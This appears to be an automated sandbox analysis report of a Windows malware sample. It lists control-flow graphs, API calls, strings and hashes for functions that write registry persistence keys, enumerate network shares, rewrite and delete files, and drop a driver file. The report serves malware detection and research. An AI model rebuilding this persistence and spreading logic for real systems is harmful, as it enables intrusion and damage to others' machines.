                                                                                                                                                                                                                                    control_flow_graph 878 1284d96-1284e3a call 1298060 881 1284e3c 878->881 882 1284e41-1284eb1 lstrcpy lstrlen wsprintfA RegOpenKeyExA 878->882 883 1285459-1285469 881->883 884 1285112-1285134 882->884 885 1284eb7-1284ed2 RegCreateKeyA 882->885 889 128513a-1285163 wsprintfA 884->889 890 128529e-12852a5 884->890 886 1284ee0-1284f04 GlobalAlloc call 128c89a 885->886 887 1284ed4-1284edb 885->887 904 1284f1d-1284f24 886->904 905 1284f06-1284f15 call 1286330 886->905 887->883 894 12851a0-12851d9 RegQueryValueExA 889->894 895 1285165-1285197 RegQueryValueExA 889->895 892 128542a-1285431 890->892 893 12852ab-1285408 call 129772b * 5 call 1286330 890->893 900 1285440-1285447 892->900 901 1285433-128543a RegCloseKey 892->901 959 128540a-1285423 call 129772b 893->959 960 1285425 893->960 898 12851db 894->898 899 12851e0-1285202 894->899 902 1285199 895->902 903 128519e 895->903 898->899 910 1285208-128520e 899->910 911 1285299 899->911 900->883 901->900 903->899 907 1284f2a-1284f4c 904->907 908 12850f0-12850f7 904->908 912 1284f1a 905->912 926 1284f52-1284f96 wsprintfA 907->926 927 1285085-12850ed RegCloseKey call 129772b * 2 907->927 922 12850f9-1285100 GlobalFree 908->922 923 1285106-128510d 908->923 915 128527c-1285296 call 12849f9 910->915 916 128525d-128527a call 12849f9 910->916 917 128523f-128524d 910->917 918 128524f-128525b 910->918 919 1285231-128523d 910->919 920 1285223-128522f 910->920 921 1285215-1285221 910->921 911->911 912->904 915->911 916->911 917->911 918->911 919->911 920->911 921->911 922->923 923->883 929 1284f9c-1284fa2 926->929 930 1285027-128502e 926->930 927->908 929->915 929->916 929->917 929->918 929->919 929->920 929->921 937 1284fa9-1284fb3 929->937 938 1284fcd-1284fd7 929->938 939 1284fc1-1284fcb 929->939 940 1284fe5-1285005 call 1284a5b lstrcpy 929->940 941 1285007-1285021 call 1284a5b lstrcpy 929->941 942 1284fd9-1284fe3 929->942 943 1284fb5-1284fbf 929->943 935 1285030-1285051 RegSetValueExA 930->935 936 1285053-128507a lstrlen RegSetValueExA 930->936 946 1285080 935->946 936->946 937->930 938->930 939->930 940->930 941->930 942->930 943->930 959->892 960->892
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,Software\Erlloywmr), ref: 01284E54
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,\%d,6E6F7266), ref: 01284E78
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01284E86
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 01284EA9
                                                                                                                                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 01284ECA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: Software\Erlloywmr$\%d$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 4004410694-3772162829
                                                                                                                                                                                                                                    • Opcode ID: d948be175dd2c31f3435d80603fd571c63144fe9462fe5e669f681ecb5e8f9b5
                                                                                                                                                                                                                                    • Instruction ID: bb8be69fee61e1a87f969223cb70f07f2af509be754ca7cb5824ea8ebbf375bc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d948be175dd2c31f3435d80603fd571c63144fe9462fe5e669f681ecb5e8f9b5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D502C1B1922218DBDB24EF54DC85BE9B779FB58304F0882D9E619672C0DB729B84CF50
                                                                                                                                                                                                                                    Function 0129195D Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 216stringsharesleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 963 129195d-1291a24 Sleep WNetOpenEnumA 964 1291a42-1291a57 GlobalAlloc 963->964 965 1291a26-1291a3d 963->965 967 1291a5a-1291a61 964->967 966 1291cd2-1291ce2 965->966 968 1291c9d-1291ccd GlobalFree WNetCloseEnum 967->968 969 1291a67-1291a9f call 1284060 WNetEnumResourceA 967->969 968->966 973 1291c7e-1291c89 GetLastError 969->973 974 1291aa5-1291ac9 969->974 975 1291c8b 973->975 976 1291c8d-1291c98 Sleep 973->976 978 1291c7c 974->978 979 1291acf-1291ae0 974->979 975->968 976->967 978->976 980 1291c77 979->980 981 1291ae6-1291af7 979->981 981->980 982 1291afd-1291b0e 981->982 983 1291c51-1291c64 call 129195d 982->983 984 1291b14-1291b42 lstrcpy lstrcat call 1290b9a 982->984 987 1291c69-1291c71 Sleep 983->987 988 1291b47-1291b4c 984->988 987->980 988->983 989 1291b52-1291b65 988->989 990 1291b6b-1291b94 lstrcpy lstrlen 989->990 991 1291bf1-1291bfa 989->991 994 1291ba8-1291be8 lstrlen call 128a16b lstrcat call 1290c4b 990->994 995 1291b96-1291ba2 lstrcat 990->995 992 1291c3b-1291c42 991->992 993 1291bfc-1291c38 call 1284060 lstrlen call 1291060 991->993 992->983 998 1291c44-1291c4b DeleteFileA 992->998 993->992 994->991 1005 1291bea 994->1005 995->994 998->983 1005->991
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 012919FA
                                                                                                                                                                                                                                    • WNetOpenEnumA.MPR(00000002,00000000,00000000,01299078,?), ref: 01291A11
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00007F80), ref: 01291A51
                                                                                                                                                                                                                                    • WNetEnumResourceA.MPR(?,?,?,?), ref: 01291A92
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 01291B29
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,01283D50), ref: 01291B38
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 01291B76
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01291B83
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,01283D54), ref: 01291BA2
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01291BAF
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,.tmp), ref: 01291BD1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcat$Enumlstrcpylstrlen$AllocGlobalOpenResourceSleep
                                                                                                                                                                                                                                    • String ID: .tmp
                                                                                                                                                                                                                                    • API String ID: 2671286937-2986845003
                                                                                                                                                                                                                                    • Opcode ID: aa681534e27b2027f2489b4d8173517ecb8b76a54e45a1ae26375a3f6c25a6da
                                                                                                                                                                                                                                    • Instruction ID: 34d736e4e9d34e3d06c9d80d23f43cc2ebd7006afbc9dcf6662120fca9171587
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa681534e27b2027f2489b4d8173517ecb8b76a54e45a1ae26375a3f6c25a6da
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1791CE71A1061ADFDF20CF58DC49BEFBBB5BB44312F008298E619A7280D776AA55CF50
                                                                                                                                                                                                                                    Function 01289EEA Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176libraryloadersleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1031 1289eea-1289ef7 1032 1289ef9-1289f04 Sleep 1031->1032 1033 1289f06-1289f0b Sleep 1031->1033 1034 1289f11-1289f3e call 1288f51 * 2 1032->1034 1033->1034 1038 1289f43-1289f5a LoadLibraryA 1034->1038 1039 128a149-128a168 RtlExitUserThread 1038->1039 1040 1289f60-1289f7c GetProcAddress 1038->1040 1042 1289f7e 1040->1042 1043 1289f83-1289fa0 GetProcAddress 1040->1043 1044 1289fa2 1043->1044 1045 1289fa7-1289fc4 GetProcAddress 1043->1045 1046 1289fcb-1289fe7 GetProcAddress 1045->1046 1047 1289fc6 1045->1047 1048 1289fe9 1046->1048 1049 1289fee-128a00b GetProcAddress 1046->1049 1050 128a00d 1049->1050 1051 128a012-128a02f GetProcAddress 1049->1051 1052 128a031 1051->1052 1053 128a036-128a052 GetProcAddress 1051->1053 1054 128a059-128a076 GetProcAddress 1053->1054 1055 128a054 1053->1055 1056 128a078-128a155 1054->1056 1057 128a07d-128a0ba call 12892f3 CreateThread call 12841c6 LoadLibraryA 1054->1057 1056->1039 1057->1039 1063 128a0c0-128a0dc GetProcAddress 1057->1063 1063->1039 1064 128a0de-128a0e5 call 128917d 1063->1064 1067 128a113-128a11a call 128917d 1064->1067 1068 128a0e7-128a110 call 12845d2 call 1289243 1064->1068 1067->1039 1074 128a11c-128a123 call 1289706 1067->1074 1068->1067 1074->1039 1078 128a125-128a146 CreateThread call 12841c6 1074->1078 1078->1039
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0001D4C0), ref: 01289EFE
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001000), ref: 01289F0B
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(012827C0), ref: 01289F4D
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,012827D0), ref: 01289F6A
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,012827E0), ref: 01289F8E
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,012827F0), ref: 01289FB2
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 0128A14B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$Sleep$ExitLibraryLoadThreadUser
                                                                                                                                                                                                                                    • String ID: C:\Windows\system32\drivers\npjnsn.sys
                                                                                                                                                                                                                                    • API String ID: 3711489173-2135717084
                                                                                                                                                                                                                                    • Opcode ID: 67606a014b9f55d25fb011c9c1e3f7cdc74084b9c5d147b743bff2621eb4582f
                                                                                                                                                                                                                                    • Instruction ID: 103b3e90a08db92dedfd35f80c5dde4e97339b401620604193d745519954ac87
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67606a014b9f55d25fb011c9c1e3f7cdc74084b9c5d147b743bff2621eb4582f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E61C274A21204EFEF20FFA8F84DB6937B8AB98355F00851AEA05932D8DB716594CF10
                                                                                                                                                                                                                                    Function 01284AF0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 162registrystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1118 1284af0-1284b59 call 1298060 1121 1284b5b 1118->1121 1122 1284b60-1284bc9 lstrcpy lstrlen wsprintfA RegOpenKeyExA 1118->1122 1123 1284d75-1284d79 1121->1123 1124 1284bcb-1284be6 RegCreateKeyA 1122->1124 1125 1284bed-1284c0f 1122->1125 1124->1125 1127 1284be8 1124->1127 1128 1284d68-1284d6f RegCloseKey 1125->1128 1129 1284c15-1284c5a wsprintfA 1125->1129 1127->1123 1128->1123 1130 1284d0a-1284d11 1129->1130 1131 1284c60-1284c66 1129->1131 1139 1284d13-1284d34 RegSetValueExA 1130->1139 1140 1284d36-1284d5d lstrlen RegSetValueExA 1130->1140 1132 1284cbc-1284ce3 call 1284a5b lstrcpy 1131->1132 1133 1284c6d-1284c78 1131->1133 1134 1284c7d-1284c8b 1131->1134 1135 1284c8d-1284c9b 1131->1135 1136 1284c9d-1284cac 1131->1136 1137 1284cae-1284cba 1131->1137 1138 1284ce5-1284d04 call 1284a5b lstrcpy 1131->1138 1132->1130 1133->1130 1134->1130 1135->1130 1136->1130 1137->1130 1138->1130 1141 1284d63 1139->1141 1140->1141
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,Software\Erlloywmr), ref: 01284B6C
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,\%d,6E6F7266), ref: 01284B90
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01284B9E
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 01284BC1
                                                                                                                                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 01284BDE
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: Software\Erlloywmr$\%d$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 4004410694-3772162829
                                                                                                                                                                                                                                    • Opcode ID: ae48966316fe4b2b8bece7b310e6a39c356103d5e1d72e1c8ff93b02caa78b31
                                                                                                                                                                                                                                    • Instruction ID: ee1d4ec600be8a0bed0e13b2d6cb6cef6c8769d1935642990f7d0d91b94d12fb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae48966316fe4b2b8bece7b310e6a39c356103d5e1d72e1c8ff93b02caa78b31
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE617F75914259EFCB28EF54DC5ABE9B778EB58701F0081D8E709A7284D7B0AAC4CF90
                                                                                                                                                                                                                                    Function 012914D9 Relevance: 25.7, APIs: 17, Instructions: 172filestringmemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1146 12914d9-129152d CreateFileA 1147 129152f-1291531 1146->1147 1148 1291536-1291582 GlobalAlloc ReadFile lstrlen call 1284527 1146->1148 1149 1291746-1291749 1147->1149 1151 1291587-1291597 1148->1151 1152 129159d-12915c9 lstrlen call 12847bb 1151->1152 1153 1291730-1291734 1151->1153 1152->1153 1158 12915cf-12915d9 1152->1158 1154 1291740 1153->1154 1155 1291736-129173a GlobalFree 1153->1155 1154->1149 1155->1154 1159 12915ed-12915fc 1158->1159 1160 12915fe-129163f lstrlen call 12842ec call 12843c5 1159->1160 1161 1291641-12916b6 SetFilePointer WriteFile SetFilePointer SetEndOfFile CloseHandle 1159->1161 1160->1159 1163 12916b8-12916c2 1161->1163 1164 12916c4-12916c8 1161->1164 1163->1164 1166 12916e5-129172a call 1284631 Sleep CreateThread call 12841c6 Sleep 1163->1166 1167 12916ca-12916ce GlobalFree 1164->1167 1168 12916d4-12916e3 DeleteFileA 1164->1168 1166->1153 1167->1168 1168->1149
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 0129151A
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 01291542
                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 01291563
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(012621A4), ref: 0129156E
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(012621A4), ref: 012915A2
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(01282654,?), ref: 0129160C
                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0129164E
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 01291672
                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0129168D
                                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(?), ref: 0129169A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$lstrlen$Pointer$AllocCreateGlobalReadWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3635920088-0
                                                                                                                                                                                                                                    • Opcode ID: f70ded06fb1eac843c979dd74e2de500aa43f55b51188d728792ed4056afdad0
                                                                                                                                                                                                                                    • Instruction ID: 8c5955a4fb9293b033eedc3f6fbf1ecfd39978e34fccb0d9033a8752ca37370b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f70ded06fb1eac843c979dd74e2de500aa43f55b51188d728792ed4056afdad0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D613175A10219EFDB24DBA8DD4AFDD7779AB48701F108184F709A72C4D7B4AA90CF90
                                                                                                                                                                                                                                    Function 01286330 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 408memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1176 1286330-12863d7 call 1298060 RtlEnterCriticalSection 1179 128672a-128672e 1176->1179 1180 12863dd-1286410 call 129772b 1176->1180 1181 128695b-1286980 RtlLeaveCriticalSection 1179->1181 1182 1286734-1286749 IsBadWritePtr 1179->1182 1188 1286412 1180->1188 1189 1286417-128645f 1180->1189 1182->1181 1185 128674f-1286758 1182->1185 1185->1181 1187 128675e-1286767 1185->1187 1187->1181 1190 128676d-1286788 call 1284145 1187->1190 1191 1286461 1189->1191 1192 1286466-1286494 call 129772b 1189->1192 1190->1181 1199 128678e-12867f8 wsprintfA lstrlen call 12842ec call 12843c5 1190->1199 1197 1286496-12864a5 1192->1197 1198 12864c7 1192->1198 1197->1198 1200 12864a7-12864b4 1197->1200 1199->1181 1211 12867fe-128680d 1199->1211 1200->1198 1202 12864b6-12864c5 1200->1202 1202->1198 1204 12864cc-12864db 1202->1204 1206 12864dd 1204->1206 1207 12864e2-12864ef 1204->1207 1209 12864f1-1286500 1207->1209 1210 1286507-12865a6 call 129772b * 4 call 12847bb 1207->1210 1209->1210 1212 1286502 1209->1212 1235 12865a8 1210->1235 1236 12865ad-12865b7 1210->1236 1211->1181 1213 1286813-128681d 1211->1213 1213->1181 1215 1286823-128684a call 12847bb 1213->1215 1215->1181 1221 1286850-1286866 1215->1221 1223 1286868-128686f GlobalFree 1221->1223 1224 1286875-12868b1 GlobalAlloc call 129772b 1221->1224 1223->1224 1230 12868bf-1286958 GlobalAlloc wsprintfA lstrlen call 12842ec call 12843c5 call 129772b call 12854a2 1224->1230 1231 12868b3-12868b9 GlobalFree 1224->1231 1230->1181 1231->1230 1238 12865c8-12865da 1236->1238 1241 1286698-128669f 1238->1241 1242 12865e0-12865ec 1238->1242 1243 12866a1-128696e 1241->1243 1244 12866a6-128671d call 129772b * 2 call 1284af0 1241->1244 1246 12865fd-128660e 1242->1246 1243->1181 1266 1286722-1286725 1244->1266 1250 1286610-128661f 1246->1250 1251 1286623-1286657 lstrcpy 1246->1251 1250->1251 1256 1286621 1250->1256 1252 1286659-1286663 1251->1252 1253 1286687-1286693 1251->1253 1252->1253 1258 1286665-128666f 1252->1258 1253->1238 1256->1246 1258->1253 1262 1286671-128667b 1258->1262 1262->1253 1264 128667d 1262->1264 1264->1253 1266->1181
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(01299050), ref: 012863CD
                                                                                                                                                                                                                                    • IsBadWritePtr.KERNEL32(00000000,-00000008), ref: 01286741
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 012867A0
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?), ref: 012867B7
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0128686F
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 01286883
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(01299050), ref: 01286960
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CriticalGlobalSection$AllocEnterFreeLeaveWritelstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: purity_control_%x$purity_control_%x
                                                                                                                                                                                                                                    • API String ID: 2588801185-2962537068
                                                                                                                                                                                                                                    • Opcode ID: b3695a4ec1b8c7fc586f287016dceb027ad1054474d8d4358f6068e84b907ca3
                                                                                                                                                                                                                                    • Instruction ID: ae52bcf88abb74b4be2a8841723603d1aeca6c76b6072f9fb652c75048cfe32c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3695a4ec1b8c7fc586f287016dceb027ad1054474d8d4358f6068e84b907ca3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C002D371911219DFCB25DF18DC90FEA77B6BF94304F0481E8EA499B285D772AA90CF90
                                                                                                                                                                                                                                    Function 01285760 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 247registrystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1267 1285760-12857e1 1268 12857ec 1267->1268 1269 12857e3-12857ea 1267->1269 1271 1285c01-1285c05 1268->1271 1269->1268 1270 12857f1-1285825 lstrcpy RegOpenKeyExA 1269->1270 1272 1285854-1285858 1270->1272 1273 1285827-128582b 1270->1273 1276 1285a4b-1285a89 1272->1276 1277 128585e-1285868 1272->1277 1274 128582d 1273->1274 1275 1285832-128584d RegCreateKeyA 1273->1275 1274->1271 1275->1272 1279 128584f 1275->1279 1281 1285beb-1285bf2 1276->1281 1282 1285a8f-1285a99 1276->1282 1280 1285872-128589e RegEnumValueA 1277->1280 1279->1271 1283 12858a0-12858a9 1280->1283 1284 12858d4-128590b 1280->1284 1281->1271 1285 1285bf4-1285bfb RegCloseKey 1281->1285 1282->1281 1286 1285a9f-1285aca 1282->1286 1287 12858ab 1283->1287 1288 12858ad-12858d2 RegDeleteValueA 1283->1288 1291 1285911-1285923 1284->1291 1292 1285a46 1284->1292 1285->1271 1295 1285bd9-1285bdf 1286->1295 1296 1285ad0-1285b35 wsprintfA RegQueryValueExA 1286->1296 1287->1284 1288->1280 1293 1285935 1291->1293 1294 1285925-1285933 1291->1294 1292->1281 1293->1292 1294->1293 1297 128593a-1285944 1294->1297 1295->1281 1298 1285b46-1285b82 1296->1298 1299 1285b37-1285b41 1296->1299 1300 1285955-128595c 1297->1300 1301 1285bd4 1298->1301 1302 1285b84-1285b8a 1298->1302 1299->1295 1303 1285a41 1300->1303 1304 1285962-12859ae wsprintfA 1300->1304 1301->1295 1305 1285b91-1285b9f 1302->1305 1306 1285ba1-1285bb2 1302->1306 1307 1285bb4-1285bc3 1302->1307 1308 1285bc5-1285bd1 1302->1308 1303->1292 1309 12859b0-12859b6 1304->1309 1310 1285a01-1285a3c RegSetValueExA 1304->1310 1305->1301 1306->1301 1307->1301 1308->1301 1309->1305 1309->1306 1309->1307 1309->1308 1311 12859bd-12859cb 1309->1311 1312 12859cd-12859df 1309->1312 1313 12859e1-12859f0 1309->1313 1314 12859f2-12859fb 1309->1314 1315 1285946-128594f 1310->1315 1311->1310 1312->1310 1313->1310 1314->1310 1315->1300
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,Software\Erlloywmr), ref: 012857FD
